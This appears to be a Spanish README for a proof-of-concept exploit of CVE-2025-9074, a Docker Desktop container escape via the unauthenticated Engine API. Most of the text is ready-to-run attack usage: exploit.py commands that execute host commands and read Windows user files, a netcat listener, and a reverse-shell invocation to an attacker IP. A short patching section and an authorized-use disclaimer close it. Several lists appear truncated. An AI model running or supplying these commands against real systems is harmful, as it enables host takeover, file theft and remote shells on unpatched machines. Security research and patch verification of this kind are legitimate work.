
Exploit de prueba de concepto para CVE-2025-9074 - Escape de contenedor no autenticado de la API del motor Docker que afecta a Docker Desktop < 4.44.3 en Windows y macOS (CVSS 9.3)
Exploit de Prueba de Concepto para CVE-2025-9074 - una vulnerabilidad crítica de escape de contenedor en Docker Desktop que permite acceso no autenticado a la API del Motor Docker.
| Propiedad | Valor |
|---|---|
| ID CVE | CVE-2025-9074 |
| Puntuación CVSS | 9.3 (Crítica) |
| Software Afectado | Docker Desktop < 4.44.3 |
| Plataformas Afectadas | Windows, macOS (Linux NO afectado) |
| Versión Corregida | Docker Desktop 4.44.3+ |
| Descubridores | Felix Boulet, Philippe Dugré |
| Fecha de Descubrimiento | Mediados de 2025 |
| Fecha del Parche | 20 de agosto de 2025 |
La vulnerabilidad permite que contenedores ejecutándose en Docker Desktop accedan a la API del Motor Docker en http://192.168.65.7:2375 sin autenticación. Esto ocurre independientemente de:
La API del Motor Docker estaba expuesta en un socket TCP accesible desde dentro de los contenedores, permitiendo:
pip3 install requests
# Execute a command on the host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"
# Read files from Windows host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"
# List users on Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"
# Terminal 1: Set up listener
nc -lvnp 4444
# Terminal 2: Execute exploit
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <YOUR_IP> -p 4444
# Once connected, host filesystem is at: /hostfs
# If you already have access to a container
curl http://192.168.65.7:2375/version
graph TD
A[Malicious Container] -->|No Auth Required| B[Docker Engine API<br/>192.168.65.7:2375]
B -->|Create Container| C[Privileged Container]
C -->|Mount Host FS| D[Full Host Access]
D -->|Read/Write| E[Compromise System]Actualice a Docker Desktop 4.44.3 o superior inmediatamente.
# Check your Docker Desktop version
docker --version
# Update Docker Desktop
# Windows: Download from https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: Download from https://desktop.docker.com/mac/main/amd64/Docker.dmg
Si la actualización inmediata no es posible:
Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
Licencia MIT - Consulte el archivo LICENSE para más detalles